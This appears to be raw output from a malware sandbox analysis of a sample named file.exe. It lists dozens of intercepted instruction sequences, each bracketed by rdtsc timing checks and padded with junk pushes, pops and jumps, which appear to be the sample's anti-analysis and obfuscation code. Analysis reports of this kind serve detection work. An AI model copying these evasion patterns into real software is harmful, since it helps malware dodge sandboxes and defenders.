Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DE94E second address: 7DE9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 jo 00007F2CBD27C5B2h 0x0000000f ja 00007F2CBD27C5ACh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F2CBD27C5A8h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 sub ebx, dword ptr [ebp+124521C2h] 0x00000037 mov bx, 80B8h 0x0000003b push 00000000h 0x0000003d mov ebx, 30457020h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push ecx 0x00000046 jnc 00007F2CBD27C5A6h 0x0000004c pop ecx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DDA5A second address: 7DDA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2CBC529175h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DE9A9 second address: 7DE9B3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CBD27C5ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DDA79 second address: 7DDA7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DDA7F second address: 7DDA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBD27C5B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF9AF second address: 7DF9B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF9B3 second address: 7DF9B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DF9B7 second address: 7DFA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007F2CBC52916Eh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D2982h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F2CBC529168h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+122D2E05h] 0x00000036 push 00000000h 0x00000038 mov edi, 44346FDCh 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jc 00007F2CBC529166h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7DFA0B second address: 7DFA1E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2CBD27C5ABh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E09B9 second address: 7E09BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E09BF second address: 7E0A2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F2CBD27C5A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jmp 00007F2CBD27C5B4h 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e jmp 00007F2CBD27C5ADh 0x00000033 pop ebx 0x00000034 push 00000000h 0x00000036 add dword ptr [ebp+12451D01h], edi 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f js 00007F2CBD27C5ACh 0x00000045 jng 00007F2CBD27C5A6h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E0C8F second address: 7E0CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBC529170h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E2CD4 second address: 7E2CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3CA0 second address: 7E3CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4B26 second address: 7E4B2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4CF9 second address: 7E4CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E7C7F second address: 7E7C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA0C6 second address: 7EA0E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA0E2 second address: 7EA10E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F2CBD27C5ACh 0x00000012 jp 00007F2CBD27C5A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB080 second address: 7EB08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBEB7 second address: 7EBEBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB08B second address: 7EB08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA1EB second address: 7EA1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBEBD second address: 7EBF14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC52916Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F2CBC529168h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D30C2h], esi 0x0000002e mov edi, dword ptr [ebp+122D3929h] 0x00000034 push 00000000h 0x00000036 jg 00007F2CBC529169h 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jbe 00007F2CBC529166h 0x00000045 push esi 0x00000046 pop esi 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA1EF second address: 7EA1F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBF14 second address: 7EBF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC014 second address: 7EC048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F2CBD27C5B4h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F2CBD27C5ACh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007F2CBD27C5A6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EC048 second address: 7EC04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F532A second address: 7F5334 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2CBD27C5A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796F21 second address: 796F38 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2CBC529168h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jbe 00007F2CBC529166h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796F38 second address: 796F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F4DC3 second address: 7F4DE5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CBC52917Bh 0x00000008 jmp 00007F2CBC529175h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FBFAA second address: 7FBFAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FBFAE second address: 7FBFC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F2CBC52916Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FC0B1 second address: 7FC0E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F2CBD27C5BDh 0x00000010 pushad 0x00000011 jns 00007F2CBD27C5A6h 0x00000017 jmp 00007F2CBD27C5AFh 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80029B second address: 80029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80093F second address: 800952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnl 00007F2CBD27C5A6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800C1F second address: 800C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 ja 00007F2CBC52916Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80539D second address: 8053A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805A0E second address: 805A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2CBC529166h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805A18 second address: 805A64 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2CBD27C5A6h 0x00000008 js 00007F2CBD27C5A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnc 00007F2CBD27C5A8h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F2CBD27C5B9h 0x0000001d pushad 0x0000001e jmp 00007F2CBD27C5B6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80503D second address: 805073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2CBC529177h 0x00000008 jmp 00007F2CBC529173h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805073 second address: 805077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805077 second address: 805098 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2CBC529166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F2CBC529166h 0x00000017 jmp 00007F2CBC52916Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805098 second address: 8050A7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CBD27C5A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8050A7 second address: 8050D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jp 00007F2CBC52917Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jp 00007F2CBC529166h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805D44 second address: 805D6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push edi 0x0000000b jne 00007F2CBD27C5A6h 0x00000011 jmp 00007F2CBD27C5ACh 0x00000016 pop edi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007F2CBD27C5A6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 805EB2 second address: 805EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2CBC529166h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2CBC529175h 0x00000011 jmp 00007F2CBC52916Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80607F second address: 80608A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F2CBD27C5A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80608A second address: 806090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80C17C second address: 80C180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80AB95 second address: 80AB99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80AB99 second address: 80ABA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2CBD27C5A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80ABA8 second address: 80ABB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B58E second address: 80B594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B594 second address: 80B599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B599 second address: 80B5B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F2CBD27C5B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80B84B second address: 80B86F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2CBC529175h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jl 00007F2CBC529166h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80BF80 second address: 80BF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80BF84 second address: 80BFC9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2CBC529166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2CBC529174h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F2CBC529170h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnp 00007F2CBC529166h 0x00000025 jp 00007F2CBC529166h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80BFC9 second address: 80BFCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80BFCD second address: 80BFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80A8B3 second address: 80A8B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80A8B7 second address: 80A8BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80A8BB second address: 80A8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBD27C5ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80A8D0 second address: 80A8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80F0B2 second address: 80F0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2CBD27C5A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F2CBD27C5A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818489 second address: 818492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D883B second address: 7D88AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2CBD27C5ADh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F2CBD27C5B1h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F2CBD27C5A8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c jp 00007F2CBD27C5ACh 0x00000032 lea eax, dword ptr [ebp+1248A628h] 0x00000038 mov cx, 004Dh 0x0000003c adc edx, 593B6C39h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 jnc 00007F2CBD27C5A6h 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8A38 second address: 7D8A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8DF8 second address: 7D8E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBD27C5AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8E06 second address: 7D8E1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CBC529175h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8E1F second address: 7D8E3B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jc 00007F2CBD27C5A6h 0x00000015 ja 00007F2CBD27C5A6h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8E3B second address: 7D8E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CBC529178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jc 00007F2CBC529168h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007F2CBC529166h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jnp 00007F2CBC529168h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8E7B second address: 7D8E81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D91FA second address: 7D9217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBC529178h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D97B9 second address: 7D97BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9ABF second address: 7D9AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CBC52916Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9AD0 second address: 7D9ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F2CBD27C5A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9ADB second address: 7B6E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F2CBC529168h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dl, 22h 0x00000024 lea eax, dword ptr [ebp+1248A628h] 0x0000002a mov edx, 568BE5FCh 0x0000002f nop 0x00000030 jmp 00007F2CBC529175h 0x00000035 push eax 0x00000036 jmp 00007F2CBC529174h 0x0000003b nop 0x0000003c call 00007F2CBC52916Ch 0x00000041 add dx, 2E36h 0x00000046 pop edx 0x00000047 call dword ptr [ebp+122D1F3Eh] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F2CBC52916Eh 0x00000054 pushad 0x00000055 push edx 0x00000056 pop edx 0x00000057 push eax 0x00000058 pop eax 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81762C second address: 817648 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CBD27C5A6h 0x00000008 jno 00007F2CBD27C5A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2CBD27C5AAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78CD34 second address: 78CD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
